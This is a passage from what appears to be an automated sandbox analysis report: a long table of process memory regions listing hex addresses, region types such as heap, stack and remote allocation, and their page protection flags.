trusted library allocation
|
page read and write
|
||
|
287B000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
8A5E000
|
heap
|
page read and write
|
||
|
1AAA338E000
|
heap
|
page read and write
|
||
|
23B0000
|
unkown
|
page readonly
|
||
|
1AAA32D3000
|
heap
|
page read and write
|
||
|
150000
|
unkown
|
page readonly
|
||
|
2C70000
|
heap
|
page read and write
|
||
|
320000
|
unkown
|
page readonly
|
||
|
5B51000
|
trusted library allocation
|
page read and write
|
||
|
5020000
|
heap
|
page read and write
|
||
|
3000000
|
remote allocation
|
page execute and read and write
|
||
|
2B339A35000
|
trusted library allocation
|
page read and write
|
||
|
1BE53821000
|
trusted library allocation
|
page read and write
|
||
|
2B34FA0B000
|
heap
|
page read and write
|
||
|
23A0000
|
heap
|
page read and write
|
||
|
7606000
|
heap
|
page read and write
|
||
|
77ED000
|
stack
|
page read and write
|
||
|
35F0000
|
heap
|
page read and write
|
||
|
AAF000
|
unkown
|
page read and write
|
||
|
8A5E000
|
heap
|
page read and write
|
||
|
596C000
|
unkown
|
page execute and read and write
|
||
|
7FF886FD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FE0000
|
trusted library allocation
|
page read and write
|
||
|
7720000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
remote allocation
|
page read and write
|
||
|
E00000
|
heap
|
page read and write
|
||
|
7291000
|
heap
|
page read and write
|
||
|
2980000
|
trusted library allocation
|
page read and write
|
||
|
4AC0000
|
direct allocation
|
page read and write
|
||
|
8120000
|
trusted library allocation
|
page read and write
|
||
|
1AAA32CB000
|
heap
|
page read and write
|
||
|
C4E000
|
stack
|
page read and write
|
||
|
C0E000
|
stack
|
page read and write
|
||
|
82D4000
|
heap
|
page read and write
|
||
|
8B7000
|
heap
|
page read and write
|
||
|
F0E000
|
stack
|
page read and write
|
||
|
2B33858E000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
8A6A000
|
heap
|
page read and write
|
||
|
303D000
|
stack
|
page read and write
|
||
|
7FF887040000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2594000
|
heap
|
page read and write
|
||
|
7010000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
1AAA4FDD000
|
heap
|
page read and write
|
||
|
2B33609E000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
759E000
|
heap
|
page read and write
|
||
|
380000
|
unkown
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
8A5E000
|
heap
|
page read and write
|
||
|
4EC0000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2417D000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
3CE000
|
unkown
|
page readonly
|
||
|
247BD000
|
direct allocation
|
page execute and read and write
|
||
|
391000
|
unkown
|
page readonly
|
||
|
A5BB000
|
direct allocation
|
page execute and read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
3D5000
|
unkown
|
page read and write
|
||
|
7FF886D40000
|
trusted library allocation
|
page read and write
|
||
|
3170000
|
heap
|
page read and write
|
||
|
2C70000
|
direct allocation
|
page read and write
|
||
|
2B335F80000
|
heap
|
page read and write
|
||
|
7FF886F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7CE7000
|
heap
|
page read and write
|
||
|
2530000
|
heap
|
page read and write
|
||
|
7497000
|
trusted library allocation
|
page read and write
|
||
|
25BA000
|
heap
|
page read and write
|
||
|
2DAE000
|
direct allocation
|
page execute and read and write
|
||
|
2B337920000
|
heap
|
page execute and read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
C3BB000
|
direct allocation
|
page execute and read and write
|
||
|
2C64000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2DCE000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
8A23000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
312E000
|
stack
|
page read and write
|
||
|
250000
|
unkown
|
page readonly
|
||
|
2DC0000
|
unkown
|
page execute and read and write
|
||
|
1AAA32F2000
|
heap
|
page read and write
|
||
|
8D990FE000
|
stack
|
page read and write
|
||
|
EA988FE000
|
stack
|
page read and write
|
||
|
8760000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
1AAA32D0000
|
heap
|
page read and write
|
||
|
864B000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
75D6000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
E41000
|
unkown
|
page readonly
|
||
|
241BC000
|
stack
|
page read and write
|
||
|
2B339C2C000
|
trusted library allocation
|
page read and write
|
||
|
FBE000
|
stack
|
page read and write
|
||
|
2B335F50000
|
heap
|
page read and write
|
||
|
150841DA000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B337930000
|
trusted library allocation
|
page read and write
|
||
|
7D0B000
|
heap
|
page read and write
|
||
|
11E7C000
|
system
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
31D0000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
4E8E000
|
stack
|
page read and write
|
||
|
758E000
|
stack
|
page read and write
|
||
|
4940000
|
heap
|
page read and write
|
||
|
4FFE000
|
stack
|
page read and write
|
||
|
2B350061000
|
heap
|
page read and write
|
||
|
8C40000
|
direct allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
1AAA32F2000
|
heap
|
page read and write
|
||
|
2B34FF35000
|
heap
|
page read and write
|
||
|
74F0000
|
trusted library allocation
|
page read and write
|
||
|
23B60000
|
direct allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
EA9857E000
|
stack
|
page read and write
|
||
|
78EF000
|
stack
|
page read and write
|
||
|
630000
|
heap
|
page read and write
|
||
|
2650000
|
heap
|
page read and write
|
||
|
1AAA32CC000
|
heap
|
page read and write
|
||
|
EA983FE000
|
stack
|
page read and write
|
||
|
2885000
|
heap
|
page read and write
|
||
|
8A1F000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
F28000
|
trusted library allocation
|
page read and write
|
||
|
1BE51C10000
|
system
|
page execute and read and write
|
||
|
7FF886D24000
|
trusted library allocation
|
page read and write
|
||
|
2CB0000
|
direct allocation
|
page read and write
|
||
|
2B336050000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
242EB000
|
stack
|
page read and write
|
||
|
E30000
|
trusted library allocation
|
page read and write
|
||
|
7660000
|
trusted library allocation
|
page read and write
|
||
|
37C0000
|
unkown
|
page execute and read and write
|
||
|
3A0000
|
unkown
|
page read and write
|
||
|
7FF8870B0000
|
trusted library allocation
|
page read and write
|
||
|
2B337960000
|
trusted library allocation
|
page read and write
|
||
|
1AAA32CA000
|
heap
|
page read and write
|
||
|
6F80000
|
direct allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2BB0000
|
trusted library allocation
|
page read and write
|
||
|
260000
|
unkown
|
page readonly
|
||
|
2693000
|
heap
|
page read and write
|
||
|
2B338519000
|
trusted library allocation
|
page read and write
|
||
|
1AAA32D4000
|
heap
|
page read and write
|
||
|
7910000
|
heap
|
page read and write
|
||
|
2C70000
|
direct allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2542000
|
unkown
|
page read and write
|
||
|
150000
|
unkown
|
page readonly
|
||
|
313E000
|
stack
|
page read and write
|
||
|
2B337F2A000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
25B0000
|
heap
|
page read and write
|
||
|
1AAA4C80000
|
heap
|
page read and write
|
||
|
49CE000
|
stack
|
page read and write
|
||
|
2482E000
|
direct allocation
|
page execute and read and write
|
||
|
7685000
|
heap
|
page read and write
|
||
|
2560000
|
heap
|
page read and write
|
||
|
8A0D000
|
heap
|
page read and write
|
||
|
300000
|
unkown
|
page readonly
|
||
|
487E000
|
stack
|
page read and write
|
||
|
310000
|
unkown
|
page readonly
|
||
|
2570000
|
heap
|
page read and write
|
||
|
58CB000
|
remote allocation
|
page execute and read and write
|
||
|
2B337C27000
|
trusted library allocation
|
page read and write
|
||
|
87C000
|
stack
|
page read and write
|
||
|
EA98679000
|
stack
|
page read and write
|
||
|
E2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF887090000
|
trusted library allocation
|
page read and write
|
||
|
483E000
|
stack
|
page read and write
|
||
|
19C95FE000
|
stack
|
page read and write
|
||
|
267E0000
|
unclassified section
|
page execute and read and write
|
||
|
EA986F6000
|
stack
|
page read and write
|
||
|
25C6000
|
heap
|
page read and write
|
||
|
7A4000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B34FEAA000
|
heap
|
page read and write
|
||
|
2F52000
|
direct allocation
|
page execute and read and write
|
||
|
8D98DFF000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
544E000
|
stack
|
page read and write
|
||
|
87D0000
|
direct allocation
|
page read and write
|
||
|
244EA000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
340E000
|
stack
|
page read and write
|
||
|
7650000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CB0000
|
direct allocation
|
page read and write
|
||
|
2B3379F0000
|
heap
|
page read and write
|
||
|
76F0000
|
trusted library allocation
|
page read and write
|
||
|
7CDF000
|
stack
|
page read and write
|
||
|
2542000
|
unkown
|
page read and write
|
||
|
EA98273000
|
stack
|
page read and write
|
||
|
2412F000
|
stack
|
page read and write
|
||
|
1AAA332A000
|
heap
|
page read and write
|
||
|
1AAA32D1000
|
heap
|
page read and write
|
||
|
4ECB000
|
remote allocation
|
page execute and read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
8A03000
|
heap
|
page read and write
|
||
|
8A0D000
|
heap
|
page read and write
|
||
|
283E000
|
stack
|
page read and write
|
||
|
3022000
|
unclassified section
|
page read and write
|
||
|
1AAA3200000
|
heap
|
page read and write
|
||
|
2B86000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
47FB000
|
stack
|
page read and write
|
||
|
1AAA32B5000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
310000
|
unkown
|
page readonly
|
||
|
1AAA3380000
|
heap
|
page read and write
|
||
|
2CB0000
|
direct allocation
|
page read and write
|
||
|
5BA8000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
E8B000
|
heap
|
page read and write
|
||
|
1AAA338A000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
113B5FF000
|
unkown
|
page read and write
|
||
|
75F8000
|
heap
|
page read and write
|
||
|
2B3501EF000
|
heap
|
page read and write
|
||
|
1BE5380B000
|
trusted library allocation
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
1BE53814000
|
trusted library allocation
|
page read and write
|
||
|
1AAA32F0000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
8D989FE000
|
stack
|
page read and write
|
||
|
2B3399D9000
|
trusted library allocation
|
page read and write
|
||
|
22E4000
|
system
|
page execute and read and write
|
||
|
782E000
|
stack
|
page read and write
|
||
|
4835000
|
heap
|
page execute and read and write
|
||
|
1AAA32B5000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
3D7000
|
unkown
|
page readonly
|
||
|
2B339B94000
|
trusted library allocation
|
page read and write
|
||
|
786F000
|
stack
|
page read and write
|
||
|
7631000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
AFBB000
|
direct allocation
|
page execute and read and write
|
||
|
1AAA32B1000
|
heap
|
page read and write
|
||
|
548F000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
7FF887080000
|
trusted library allocation
|
page read and write
|
||
|
8D991FE000
|
stack
|
page read and write
|
||
|
1AAA4FDD000
|
heap
|
page read and write
|
||
|
8200000
|
trusted library allocation
|
page execute and read and write
|
||
|
DF0000
|
trusted library section
|
page read and write
|
||
|
2B34FF70000
|
heap
|
page execute and read and write
|
||
|
1AAA32F4000
|
heap
|
page read and write
|
||
|
11BA2000
|
system
|
page read and write
|
||
|
758D000
|
heap
|
page read and write
|
||
|
7CE0000
|
heap
|
page read and write
|
||
|
9BBB000
|
direct allocation
|
page execute and read and write
|
||
|
2B35021F000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
74E0000
|
trusted library allocation
|
page read and write
|
||
|
6CCB000
|
remote allocation
|
page execute and read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2C10000
|
direct allocation
|
page execute and read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
7573000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
247B9000
|
direct allocation
|
page execute and read and write
|
||
|
1AAA32F0000
|
heap
|
page read and write
|
||
|
EA97FEE000
|
stack
|
page read and write
|
||
|
1AAA32C1000
|
heap
|
page read and write
|
||
|
1AAA3292000
|
heap
|
page read and write
|
||
|
7FF886D23000
|
trusted library allocation
|
page execute and read and write
|
||
|
8A26000
|
heap
|
page read and write
|
||
|
2B34FF76000
|
heap
|
page execute and read and write
|
||
|
F7C000
|
stack
|
page read and write
|
||
|
140000
|
unkown
|
page readonly
|
||
|
4AF0000
|
direct allocation
|
page read and write
|
||
|
630000
|
heap
|
page read and write
|
||
|
3B0000
|
unkown
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
EA985FE000
|
stack
|
page read and write
|
||
|
2CC000
|
stack
|
page read and write
|
||
|
2594000
|
heap
|
page read and write
|
||
|
86CE000
|
stack
|
page read and write
|
||
|
830000
|
unkown
|
page read and write
|
||
|
1AAA32DC000
|
heap
|
page read and write
|
||
|
1AAA3300000
|
heap
|
page read and write
|
||
|
8A6A000
|
heap
|
page read and write
|
||
|
50C6000
|
trusted library allocation
|
page read and write
|
||
|
C50000
|
heap
|
page read and write
|
||
|
2B335E70000
|
heap
|
page read and write
|
||
|
8100000
|
heap
|
page read and write
|
||
|
4BC0000
|
unkown
|
page execute and read and write
|
||
|
4D2E000
|
stack
|
page read and write
|
||
|
E41000
|
unkown
|
page readonly
|
||
|
4F7A000
|
stack
|
page read and write
|
||
|
2B337F3D000
|
trusted library allocation
|
page read and write
|
||
|
74C0000
|
trusted library allocation
|
page read and write
|
||
|
7582000
|
heap
|
page read and write
|
||
|
2DF0000
|
direct allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
7463000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
4B41000
|
trusted library allocation
|
page read and write
|
||
|
829F000
|
heap
|
page read and write
|
||
|
7FF886FC0000
|
trusted library allocation
|
page read and write
|
||
|
75CE000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
EA9897E000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B3501D2000
|
heap
|
page read and write
|
||
|
24330000
|
heap
|
page read and write
|
||
|
2B339602000
|
trusted library allocation
|
page read and write
|
||
|
EA9944E000
|
stack
|
page read and write
|
||
|
87B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
E09000
|
heap
|
page read and write
|
||
|
2D50000
|
heap
|
page read and write
|
||
|
1AAA3120000
|
heap
|
page read and write
|
||
|
4560000
|
heap
|
page read and write
|
||
|
830000
|
unkown
|
page read and write
|
||
|
2602000
|
unkown
|
page read and write
|
||
|
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
|
24688000
|
heap
|
page read and write
|
||
|
8D992FF000
|
stack
|
page read and write
|
||
|
13893E80000
|
heap
|
page read and write
|
||
|
1AAA3279000
|
heap
|
page read and write
|
||
|
253E0000
|
unclassified section
|
page execute and read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
24B8000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
764D000
|
stack
|
page read and write
|
||
|
7626000
|
heap
|
page read and write
|
||
|
566B000
|
stack
|
page read and write
|
||
|
1BE51E3B000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
48BE000
|
stack
|
page read and write
|
||
|
1BE539BE000
|
trusted library allocation
|
page read and write
|
||
|
1CA000
|
stack
|
page read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
2B337F35000
|
trusted library allocation
|
page read and write
|
||
|
25C6000
|
heap
|
page read and write
|
||
|
7D0000
|
unkown
|
page read and write
|
||
|
7FF886D2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
22D0000
|
unkown
|
page readonly
|
||
|
75C6000
|
heap
|
page read and write
|
||
|
E39000
|
trusted library allocation
|
page read and write
|
||
|
1AAA328F000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
540E000
|
stack
|
page read and write
|
||
|
CDBB000
|
direct allocation
|
page execute and read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
8770000
|
trusted library allocation
|
page read and write
|
||
|
654000
|
heap
|
page read and write
|
||
|
7FF886E40000
|
trusted library allocation
|
page execute and read and write
|
||
|
8A68000
|
heap
|
page read and write
|
||
|
A38000
|
stack
|
page read and write
|
||
|
7FF886FF0000
|
trusted library allocation
|
page read and write
|
||
|
2B339C15000
|
trusted library allocation
|
page read and write
|
||
|
5DEB000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
3310000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
260000
|
unkown
|
page readonly
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2594000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B3378F0000
|
trusted library allocation
|
page read and write
|
||
|
89A0000
|
direct allocation
|
page read and write
|
||
|
8CF000
|
heap
|
page read and write
|
||
|
2B8A000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B350140000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
3C1000
|
unkown
|
page execute read
|
||
|
307C000
|
unclassified section
|
page read and write
|
||
|
75A1000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
B9BB000
|
direct allocation
|
page execute and read and write
|
||
|
323C000
|
unclassified section
|
page read and write
|
||
|
2B337A86000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
77AC000
|
stack
|
page read and write
|
||
|
860C000
|
stack
|
page read and write
|
||
|
2B3501AE000
|
heap
|
page read and write
|
||
|
4FBD000
|
stack
|
page read and write
|
||
|
FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25C7000
|
heap
|
page read and write
|
||
|
2BB0000
|
trusted library allocation
|
page read and write
|
||
|
1AAA4FD4000
|
heap
|
page read and write
|
||
|
990000
|
unkown
|
page readonly
|
||
|
84E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
741D000
|
heap
|
page read and write
|
||
|
391000
|
unkown
|
page readonly
|
||
|
E1BB000
|
direct allocation
|
page execute and read and write
|
||
|
4B10000
|
direct allocation
|
page read and write
|
||
|
44FE000
|
stack
|
page read and write
|
||
|
7FF886DE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
762C000
|
heap
|
page read and write
|
||
|
637000
|
heap
|
page read and write
|
||
|
1AAA32B0000
|
heap
|
page read and write
|
||
|
7E0000
|
unkown
|
page read and write
|
||
|
DC0000
|
heap
|
page read and write
|
||
|
DE0000
|
trusted library section
|
page read and write
|
||
|
19C85FE000
|
stack
|
page read and write
|
||
|
75A8000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
7605000
|
heap
|
page read and write
|
||
|
4F3C000
|
stack
|
page read and write
|
||
|
DBF000
|
stack
|
page read and write
|
||
|
2698000
|
heap
|
page read and write
|
||
|
AB0000
|
unkown
|
page readonly
|
||
|
34EF000
|
unkown
|
page read and write
|
||
|
8A68000
|
heap
|
page read and write
|
||
|
24961000
|
direct allocation
|
page execute and read and write
|
||
|
22C0000
|
heap
|
page read and write
|
||
|
CF5000
|
heap
|
page read and write
|
||
|
2B3360A4000
|
heap
|
page read and write
|
||
|
46FC000
|
stack
|
page read and write
|
||
|
8110000
|
trusted library allocation
|
page execute and read and write
|
||
|
EA98A7C000
|
stack
|
page read and write
|
||
|
2B339619000
|
trusted library allocation
|
page read and write
|
||
|
8D988FA000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B339C19000
|
trusted library allocation
|
page read and write
|
||
|
2B335FD0000
|
heap
|
page read and write
|
||
|
7FF886EDA000
|
trusted library allocation
|
page read and write
|
||
|
E52000
|
trusted library allocation
|
page read and write
|
||
|
1AAA32F4000
|
heap
|
page read and write
|
||
|
8D98FFE000
|
stack
|
page read and write
|
||
|
1AAA3220000
|
heap
|
page read and write
|
||
|
1AAA32F0000
|
heap
|
page read and write
|
||
|
7A4000
|
heap
|
page read and write
|
||
|
8A18000
|
heap
|
page read and write
|
||
|
1BE51DD0000
|
heap
|
page read and write
|
||
|
82EE000
|
heap
|
page read and write
|
||
|
1BE539A8000
|
trusted library allocation
|
page read and write
|
||
|
7602000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
8130000
|
trusted library allocation
|
page read and write
|
||
|
2B336010000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
3D5000
|
unkown
|
page read and write
|
||
|
160000
|
unkown
|
page readonly
|
||
|
1BE51E20000
|
heap
|
page read and write
|
||
|
2B3383B7000
|
trusted library allocation
|
page read and write
|
||
|
8A23000
|
heap
|
page read and write
|
||
|
7CF0000
|
heap
|
page read and write
|
||
|
2B350213000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
55EE000
|
stack
|
page read and write
|
||
|
89F0000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B3501EB000
|
heap
|
page read and write
|
||
|
33CE000
|
stack
|
page read and write
|
||
|
27FE000
|
stack
|
page read and write
|
||
|
8B0000
|
heap
|
page read and write
|
||
|
1AAA3322000
|
heap
|
page read and write
|
||
|
3F0000
|
unkown
|
page readonly
|
||
|
7730000
|
trusted library allocation
|
page read and write
|
||
|
75ED000
|
heap
|
page read and write
|
||
|
1BE51E2C000
|
heap
|
page read and write
|
||
|
8A1F000
|
heap
|
page read and write
|
||
|
2B34FE50000
|
heap
|
page read and write
|
||
|
2F62000
|
unclassified section
|
page read and write
|
||
|
28B9000
|
stack
|
page read and write
|
||
|
1AAA32F2000
|
heap
|
page read and write
|
||
|
23FEF000
|
stack
|
page read and write
|
||
|
7489000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
4C98000
|
trusted library allocation
|
page read and write
|
||
|
8780000
|
trusted library allocation
|
page read and write
|
||
|
2429F000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
7FF886F60000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
7FF887070000
|
trusted library allocation
|
page read and write
|
||
|
25C2000
|
heap
|
page read and write
|
||
|
AA0000
|
heap
|
page read and write
|
There are 1119 hidden memdumps, click here to show them.